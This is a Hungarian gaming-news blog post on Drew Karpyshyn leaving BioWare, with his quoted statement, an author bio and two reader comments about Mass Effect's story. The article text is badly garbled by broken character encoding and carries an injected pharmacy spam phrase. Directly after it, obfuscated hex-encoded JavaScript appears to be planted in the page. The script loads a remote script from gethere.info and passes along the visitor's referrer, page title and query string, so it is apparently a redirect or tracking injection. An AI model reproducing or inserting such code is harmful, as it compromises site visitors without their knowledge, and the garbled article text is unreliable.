Drew Karpyshyn elhagyja a Bioware-t

BA?r a Mass Effect 3A�munkA?lataiban mA?r nem vett rA�szt, a sorozat alkotA?gA?rdA?jA?nak egyik legismertebb tagja Drew Karpsyshyn over the counter tricor. A�volt, aki az elsA� kA�t epizA?d A�rA?i munkA?latai mellett mA�g hA?rom kitA�nA� regA�nyt is A�sszehozott a tA�mA?ban. De ugyanA?gy fontos alkotA?ja volt a Knights of the Old Republic / Star Wars: The Old RepublicA�vilA?gA?nak is.

Most azonban A?gy dA�ntA�tt, hogy visszavonul a cA�gtA�l.

Az elmA?lt 12 esztendA�ben abban a megtiszteltetA�sben volt rA�szem, hogy a videA?jA?tA�k ipar egyik legjobb cA�gA�ben dolgozhattam, a legtehetsA�gesebb, leghihetetlenebb emberekkel, akiket valaha is volt szerencsA�m megismerni. MA�rhetetlenA?l A�lveztem a Bioware-nA�l tA�ltA�tt idA�met, de eljA�tt szA?momra az idA�, hogy tovA?bblA�pjek.

AzA�rt hagyom el a cA�get, hogy tA�bb idA�t A�s energiA?t A�sszpontosA�thassak a regA�nyeimre A�s egyA�b, nem videA?jA?tA�kokkal kapcsolatos projektekre. A tovA?bbiakban ugyan nem dolgozom a Bioware jA?tA�kain, de nem szakA�tok meg velA?k minden kapcsolatot. Nagyon sok kA�zeli barA?tom tovA?bbra is a cA�gben dolgozik, A�s jA?magam is A�ppen a kA�vetkezA� Star Wars: The Old Republic regA�nyt A�rom, de errA�l nem mondhatok tA�bbet.

A teljes kA�zlemA�ny ITT olvashatA?. A magunk rA�szA�rA�l pedig sok sikert kA�vA?nunk a szerzA�nek a tovA?bbi munkA?ihoz!var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Szerző:

Merras

A Miyazaki Jun nem álnév, echte original japán importárú vagyok apai részről. Amikor épp nem valami sci-fi honlapot hegesztek, vagy rendezvényt csinálok, akkor kénytelen vagyok dolgozni, ennek kapcsán online marketing tanácsadóként tevékenykedem.

81 thoughts on “Drew Karpyshyn elhagyja a Bioware-t”

  1. Szomorú hír!

    Nem akarok vészmadár lenni, de Karpyshyn volt a vezető író a Mass Effect első részénél, ami egy nagyon ütős játék lett, lehengerlő sztorival. A Mass Effect 2-nél már Mac Walters lett a vezető író és Drew csak besegített (amennyire tudom) és bár a Mass Effect 2 is egy nagyon élvezetes játék lett, de a története lényegesen gyengébbre sikeredett, mint az első részé.

    A Mass Effect 3 esetében pedig már részt sem vett, Mac Walters ismét a vezető író, és tartok tőle (az előjelek alapján), hogy gyenge lesz a végkifejlet, sablonos és lineáris történettel (akárcsak a Shadow Broker és az Arrival is egy sablonos DLC volt, 0 döntési lehetőséggel).

    Nem akarom lehúzni Walterst, de Karpyshyn egy lényegesen tehetségesebb író – erről az általa írt regényekből és játékok történeteiből is megbizonyosodhatunk. Mióta meghallottam, hogy az ME3 munkálataiban nem vesz részt, azóta aggódok a befejező epizódért és sajnos egyelőre a félelmeim egyre csak erősödnek.

    Mindenesetre remélem, hogy nem lesz igazam és a Mass Effect trilógiának befejező része egy igazán epikus, minden várakozást felülmúló története lesz, rengeteg döntési lehetőséggel és végkimenetellel, nem pedig egy lineáris, Modern Warfare-é butított szerepjáték elemekkel megszórt TPS shooter… 🙂

  2. A Shadow Broker és az Arrival alapján én annyira nem aggódnék – mindkettőnek elég fix végkimenetelűnek kellett lennie: Liarának át kellett vennie a Broker helyét, az Arrivalben meg így is, úgy is fel kellett robbantani a batarian naprendszert.

Hozzászólások lehetősége itt nem engedélyezett.